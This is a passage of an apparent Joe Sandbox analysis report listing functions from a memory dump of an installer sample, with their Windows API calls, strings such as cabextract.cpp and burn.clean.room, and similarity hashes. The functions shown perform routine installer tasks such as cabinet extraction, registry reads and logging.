DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00670CC4
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00670CD6
SetFileTime.KERNELBASE(?,?,?,?), ref: 00670CE9
CloseHandle.KERNELBASE(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,006708B1,?,?), ref: 00670CF8

Strings

cabextract.cpp, xrefs: 00670C93
Invalid operation for this state., xrefs: 00670C9D

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: Time$File$CloseDateHandleLocal
String ID: Invalid operation for this state.$cabextract.cpp
API String ID: 609741386-1751360545
Opcode ID: bf147f508bc26231b7bf3d2ec39a69b626b8e9571dbddaccca9e2d228a345816
Instruction ID: 5f8b9effd0e0b82bf23ce62b5fcc733a4b71cf05efbb5af1021231c8753bf765
Opcode Fuzzy Hash: bf147f508bc26231b7bf3d2ec39a69b626b8e9571dbddaccca9e2d228a345816
Instruction Fuzzy Hash: DB21D871810219EB97209FA8DD099FEBBBEFF047207508216F858D6690D370EA51CBA4

Function 00693565 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00693574
InterlockedIncrement.KERNEL32(006BB6C8), ref: 00693591
CLSIDFromProgID.COMBASE(Msxml2.DOMDocument,006BB6B8,?,?,?,?,?,?), ref: 006935AC
CLSIDFromProgID.OLE32(MSXML.DOMDocument,006BB6B8,?,?,?,?,?,?), ref: 006935B8

Strings

Msxml2.DOMDocument, xrefs: 006935A7
MSXML.DOMDocument, xrefs: 006935B3

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: FromProg$IncrementInitializeInterlocked
String ID: MSXML.DOMDocument$Msxml2.DOMDocument
API String ID: 2109125048-2356320334
Opcode ID: 62c2f881dbfd19dd4d6717fbe71bea9d8b7ed11f33c5cb39fde3a40492f17a4d
Instruction ID: b8cfe175d9bfb45124f3389227d5982b770be1ffe97f2d3a5e146d8de2577eb7
Opcode Fuzzy Hash: 62c2f881dbfd19dd4d6717fbe71bea9d8b7ed11f33c5cb39fde3a40492f17a4d
Instruction Fuzzy Hash: E5F0A0607801355BCF204B62BE09B962EAFDB88B54F12352AF800C2B50E7A0CA8187B0

Function 00694A6C Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 99memoryCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 00694A9D
GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 00694ACA
GetLastError.KERNEL32(?,00000000,?,00000000), ref: 00694AF6
GetLastError.KERNEL32(00000000,0069B7A0,?,00000000,?,00000000,?,00000000), ref: 00694B34
GlobalFree.KERNEL32(00000000), ref: 00694B65

Strings

fileutil.cpp, xrefs: 00694AB8, 00694B11

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLast$Global$AllocFree
String ID: fileutil.cpp
API String ID: 1145190524-2967768451
Opcode ID: 9dfc5d24fb1ca75d92c6ad3f13e0b3c89842caf373834c412202cb3189b7cc9f
Instruction ID: 796b541863492153b518348ebab0926bc8a363dedb71fd42103a734d6bec6273
Opcode Fuzzy Hash: 9dfc5d24fb1ca75d92c6ad3f13e0b3c89842caf373834c412202cb3189b7cc9f
Instruction Fuzzy Hash: B531C436D40239ABCF219A998D41FEFBAAEAF44760F114159FD14E7740EB30DD0286E4

Function 0066E956 Relevance: 9.1, APIs: 6, Instructions: 85windowCOMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000082,?,?), ref: 0066E985
SetWindowLongW.USER32(?,000000EB,00000000), ref: 0066E994
SetWindowLongW.USER32(?,000000EB,?), ref: 0066E9A8
DefWindowProcW.USER32(?,?,?,?), ref: 0066E9B8
GetWindowLongW.USER32(?,000000EB), ref: 0066E9D2
PostQuitMessage.USER32(00000000), ref: 0066EA31

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: Window$Long$Proc$MessagePostQuit
String ID:
API String ID: 3812958022-0
Opcode ID: 50bf4275bdeef4d413c4c95118806afe6be8f6886747cb25c749ba1bb31a4523
Instruction ID: 80ed5411ea30aad8d57da65e9a74b62f9a2ddc33fdddb686229424dcf0fe03f3
Opcode Fuzzy Hash: 50bf4275bdeef4d413c4c95118806afe6be8f6886747cb25c749ba1bb31a4523
Instruction Fuzzy Hash: 3221A175104114BFDF119FA8DD49EAA3B6BFF45311F144619F9069A2A4C732DD10DB90

Function 00670A81 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 101COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 00670B27
GetLastError.KERNEL32(?,?,?), ref: 00670B31

Strings

Invalid seek type., xrefs: 00670ABD
cabextract.cpp, xrefs: 00670B55
Failed to move file pointer 0x%x bytes., xrefs: 00670B62

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$cabextract.cpp
API String ID: 2976181284-417918914
Opcode ID: 09db3f15be5125365e06c692c189c5092522035cd82666490ea84093992e14d4
Instruction ID: 50c73bb9809edf3e17c1ef59c29c0cf3c7e7f934375965677c158a3f3a36ec3a
Opcode Fuzzy Hash: 09db3f15be5125365e06c692c189c5092522035cd82666490ea84093992e14d4
Instruction Fuzzy Hash: 9631A231A4021AEFDB10DF98D845DAEB76AFB04B24B14C216F91897751D331EE118BA0

Function 006932F3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00693309
SysAllocString.OLEAUT32(?), ref: 00693325
VariantClear.OLEAUT32(?), ref: 006933AC
SysFreeString.OLEAUT32(00000000), ref: 006933B7

Strings

xmlutil.cpp, xrefs: 0069333C

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: StringVariant$AllocClearFreeInit
String ID: xmlutil.cpp
API String ID: 760788290-1270936966
Opcode ID: 87253b04aaaa93a7d272994996f07675cfb7ce6a48f65f10f032baf2bda624e9
Instruction ID: b9146cc0450147d2b01374662155402d92dd4c4a6333c59861bfa6938a440a03
Opcode Fuzzy Hash: 87253b04aaaa93a7d272994996f07675cfb7ce6a48f65f10f032baf2bda624e9
Instruction Fuzzy Hash: C4216035941229AFCF21DFA4C948EAEBBBEAF45B15F150158F905EB710DB319E018B90

Function 00654115 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,0066A0E8,00000000,00000000,?,00000000,006553BD,00000000,?,?,0065D5B5,?), ref: 00654123
GetLastError.KERNEL32(?,0066A0E8,00000000,00000000,?,00000000,006553BD,00000000,?,?,0065D5B5,?,00000000,00000000), ref: 00654131
CreateDirectoryW.KERNEL32(?,840F01E8,00655489,?,0066A0E8,00000000,00000000,?,00000000,006553BD,00000000,?,?,0065D5B5,?,00000000), ref: 0065419A
GetLastError.KERNEL32(?,0066A0E8,00000000,00000000,?,00000000,006553BD,00000000,?,?,0065D5B5,?,00000000,00000000), ref: 006541A4

Strings

dirutil.cpp, xrefs: 006541D4

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: dirutil.cpp
API String ID: 1375471231-2193988115
Opcode ID: a5636e7395e5c899f360f1c09ed003bd34536d5948a6a137fefb99ca94e615eb
Instruction ID: ed614401e1afb3e84a89a431e45cf1e0a35d2d4cdb611826d8f5850fb155c554
Opcode Fuzzy Hash: a5636e7395e5c899f360f1c09ed003bd34536d5948a6a137fefb99ca94e615eb
Instruction Fuzzy Hash: 9A113636600B3597DB311AA15C40BBBB66BEF75BABF1100A5FD04EB340EB608CC592D4

Function 00690764 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63filestringCOMMONLIBRARYCODE

Download Yara Rule

APIs

lstrlenA.KERNEL32(;f,00000000,00000000,?,?,?,00690013,0066E93B,0066E93B,?,00000000,0000FDE9,?,0066E93B,8000FFFF,Unexpected return value from message pump.), ref: 00690776
WriteFile.KERNELBASE(00000200,00000000,00000000,?,00000000,?,?,00690013,0066E93B,0066E93B,?,00000000,0000FDE9,?,0066E93B,8000FFFF), ref: 006907B2
GetLastError.KERNEL32(?,?,00690013,0066E93B,0066E93B,?,00000000,0000FDE9,?,0066E93B,8000FFFF,Unexpected return value from message pump.), ref: 006907BC

Strings

logutil.cpp, xrefs: 006907ED
;f, xrefs: 00690769, 006907D8, 00690775, 0069078B, 006907AC, 006907B0

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLastWritelstrlen
String ID: ;f$logutil.cpp
API String ID: 606256338-3940505684
Opcode ID: c1bd3b090c763f90ce37ee7995308e8e3abadd35a3ff9d86cd5e1be55bf1690e
Instruction ID: a4453d1ce8c4a521571d07d53cb2a8dea40f69cc781a51e9b9bd218e727f0766
Opcode Fuzzy Hash: c1bd3b090c763f90ce37ee7995308e8e3abadd35a3ff9d86cd5e1be55bf1690e
Instruction Fuzzy Hash: A411CA72900125BFD7108AE5DD449EFBA6EEB44771F110225FD00DB640DB70AD40DAE0

Function 00663AA6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00690F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,006BAAA0,00000000,?,006957E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00690F80

RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,00663FB5,feclient.dll,?,00000000,?,?,?,00654B12), ref: 00663B42

Part of subcall function 006910B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0069112B
Part of subcall function 006910B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00691163

Strings

feclient.dll, xrefs: 00663AAB
Logging, xrefs: 00663AD4
SOFTWARE\Policies\Microsoft\Windows\Installer, xrefs: 00663AB7

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer$feclient.dll
API String ID: 1586453840-3596319545
Opcode ID: 167181133907db778f08d7595eedcac1a1e14eb10f9085278490e00485c072cf
Instruction ID: ce68b8503350961127276284cab0a79b49ba72df5e4b504f25afe2151e8d95fa
Opcode Fuzzy Hash: 167181133907db778f08d7595eedcac1a1e14eb10f9085278490e00485c072cf
Instruction Fuzzy Hash: 3A119332A40228BBDB21DA95DD82EFEBBBAEB21700F500065E5019B351D6719F81D750

Function 006709EA Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0067140C: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,00670A19,?,?,?), ref: 00671434
Part of subcall function 0067140C: GetLastError.KERNEL32(?,00670A19,?,?,?), ref: 0067143E

ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 00670A27
GetLastError.KERNEL32 ref: 00670A31

Strings

Failed to read during cabinet extraction., xrefs: 00670A5F
cabextract.cpp, xrefs: 00670A55

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLast$PointerRead
String ID: Failed to read during cabinet extraction.$cabextract.cpp
API String ID: 2170121939-2426083571
Opcode ID: 614bad42703e7a96fdf773c374bd9769d55096b2cd7271aceb9d53b45510b4ad
Instruction ID: 1e7218087cd3d229433b1219aaab46574c075e7bffad097c2aa449347385b058
Opcode Fuzzy Hash: 614bad42703e7a96fdf773c374bd9769d55096b2cd7271aceb9d53b45510b4ad
Instruction Fuzzy Hash: AE11C236900225FBDB219F95DD04D9E7B6AFF05760F018159FD08A7251D7309D10DAE4

Function 0067140C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,00670A19,?,?,?), ref: 00671434
GetLastError.KERNEL32(?,00670A19,?,?,?), ref: 0067143E

Strings

cabextract.cpp, xrefs: 00671462
Failed to move to virtual file pointer., xrefs: 0067146C

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: Failed to move to virtual file pointer.$cabextract.cpp
API String ID: 2976181284-3005670968
Opcode ID: d59fa6c298f591893e300348349a52ed5cc0e01bfba7aee31cec71be9a85c988
Instruction ID: 376da551a18c146ad1ea44b42c0416f334d525862b82727a6345483dabda6836
Opcode Fuzzy Hash: d59fa6c298f591893e300348349a52ed5cc0e01bfba7aee31cec71be9a85c988
Instruction Fuzzy Hash: 6F01F7339006357BC7215A9A9C04A9BBF6BFF01B70B11C12BFD1C5A201D7319C10C6D4

Function 006707B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(0069B478,00000000,?,00671717,?,00000000,?,0065C287,?,00655405,?,006675A5,?,?,00655405,?), ref: 006707BF
GetLastError.KERNEL32(?,00671717,?,00000000,?,0065C287,?,00655405,?,006675A5,?,?,00655405,?,00655445,00000001), ref: 006707C9

Strings

Failed to set begin operation event., xrefs: 006707F7
cabextract.cpp, xrefs: 006707ED

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorEventLast
String ID: Failed to set begin operation event.$cabextract.cpp
API String ID: 3848097054-4159625223
Opcode ID: a024d52f6d9450e31a23fcda561c27528d06183e7c8ef8399270e489cf2d964e
Instruction ID: eed919964426bf2df23831a6d4b58fdf3985a7a57fd461c3133a4f7073f47147
Opcode Fuzzy Hash: a024d52f6d9450e31a23fcda561c27528d06183e7c8ef8399270e489cf2d964e
Instruction Fuzzy Hash: 45F02733A42230A7A72066955D05ACF778B9E05FA1B02402AFE08BB240E710AC00C6EA

Function 00655123 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(burn.clean.room,?,?,?,?,00651104,?,?,00000000), ref: 00655142
CompareStringW.KERNELBASE(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,?,00651104,?,?,00000000), ref: 00655172

Strings

burn.clean.room, xrefs: 0065512F, 0065513C, 00655169

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: CompareStringlstrlen
String ID: burn.clean.room
API String ID: 1433953587-3055529264
Opcode ID: 55ca4af33cfc7ff50a021c0c3c02bd32c14f728176142068af19cf06e253ebdc
Instruction ID: f410aafa1b092b655c8e7da4192cbd5bfa8814738b47d1683d51863f1e461dbe
Opcode Fuzzy Hash: 55ca4af33cfc7ff50a021c0c3c02bd32c14f728176142068af19cf06e253ebdc
Instruction Fuzzy Hash: 740162B2500A247F87304F88AD98AB3BFAFEB15761F105216F906D3B10D7709C85CBA2

Function 00653838 Relevance: 4.6, APIs: 3, Instructions: 80libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00653877
GetLastError.KERNEL32 ref: 00653881
LoadLibraryW.KERNELBASE(?,?,00000104,?), ref: 006538EA

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: DirectoryErrorLastLibraryLoadSystem
String ID:
API String ID: 1230559179-0
Opcode ID: 8081bfb438d7a4d6cf4a995ec0d6119db940c25e591c73e483702f9a92b0c8b8
Instruction ID: 0c5596fdf5ab2e1b42c8f56e6c6619923b562c02ac0a90809f9eec6a95cf3d92
Opcode Fuzzy Hash: 8081bfb438d7a4d6cf4a995ec0d6119db940c25e591c73e483702f9a92b0c8b8
Instruction Fuzzy Hash: 7C210AB2D0133DA7DB209F659C45F9A776E9B04B51F1101A9FE14EB341E670DE4887D0

Function 00653A16 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00653BB6,00000000,?,00651474,00000000,7707B390,00000000,7707B390,00000000,?,?,006513B8), ref: 00653A20
RtlFreeHeap.NTDLL(00000000,?,00653BB6,00000000,?,00651474,00000000,7707B390,00000000,7707B390,00000000,?,?,006513B8,?,00000100), ref: 00653A27
GetLastError.KERNEL32(?,00653BB6,00000000,?,00651474,00000000,7707B390,00000000,7707B390,00000000,?,?,006513B8,?,00000100,?), ref: 00653A31

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: Heap$ErrorFreeLastProcess
String ID:
API String ID: 406640338-0
Opcode ID: 6ebfa8dabfa4540d25e3bcaee0d0f21bbd04247d2dab79a48f5a6013e140f5ff
Instruction ID: 708c898cefc0dba3ebad6ed176f01a94ce59a41662e56dc3adc0a4039aa772ad
Opcode Fuzzy Hash: 6ebfa8dabfa4540d25e3bcaee0d0f21bbd04247d2dab79a48f5a6013e140f5ff
Instruction Fuzzy Hash: DDD01273A041395787211BE66D5C99B7E5DEF04EE2B011126FD84D6720DB25CD0096E4

Function 0065F755 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00690F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,006BAAA0,00000000,?,006957E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00690F80

RegCloseKey.ADVAPI32(00000000,?,?,00000001,00000000,00000000,?,?,?,00667D59,?,?,?), ref: 0065F7B9

Part of subcall function 00691026: RegQueryValueExW.ADVAPI32(00000004,?,00000000,00000000,?,00000000,?,00000000,?,?,?,0065F78E,00000000,Installed,00000000,?), ref: 0069104B

Strings

Installed, xrefs: 0065F781

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Installed
API String ID: 3677997916-3662710971
Opcode ID: fae8f53002b0259d41c432fd071dcc9832ad467bf56fb34d3f13901ea78f25b2
Instruction ID: 8462199f43291fda3641600823b520e90d3704045fece1155adadbc334b6b2b9
Opcode Fuzzy Hash: fae8f53002b0259d41c432fd071dcc9832ad467bf56fb34d3f13901ea78f25b2
Instruction Fuzzy Hash: F2018F32820118EFCB11DB94D946BDEBBB9EF04712F1141A9F800AB210D7769E54DB90

Function 00690F6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,006BAAA0,00000000,?,006957E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00690F80

Strings

regutil.cpp, xrefs: 00690FC3

Memory Dump Source

Source File: 00000002.00000002.1640977664.0000000000651000.00000020.00000001.01000000.00000005.sdmp, Offset: 00650000, based on PE: true

Associated: 00000002.00000002.1640930062.0000000000650000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641022553.000000000069B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641052168.00000000006BA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1641079187.00000000006BD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_650000_24EPV9vjc5.jbxd

Similarity

API ID: Open
String ID: regutil.cpp
API String ID: 71445658-955085611
Opcode ID: 5903b7881d8ac1fe790ef93f5ef9774722876b117b9278eb882f6e43f2bed9a7
Instruction ID: 04ceaece5d99dcaab9f559b98599fce8b61018f434f438a52287746a7ea8206f
Opcode Fuzzy Hash: 5903b7881d8ac1fe790ef93f5ef9774722876b117b9278eb882f6e43f2bed9a7
Instruction Fuzzy Hash: 30F0F6336011326EBF3009568C05BABAA4FDB847B0F254125BD4A9AB50F6618D0196F0

Function 00653AF0 Relevance: 3.0, APIs: 2, Instructions: 14memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

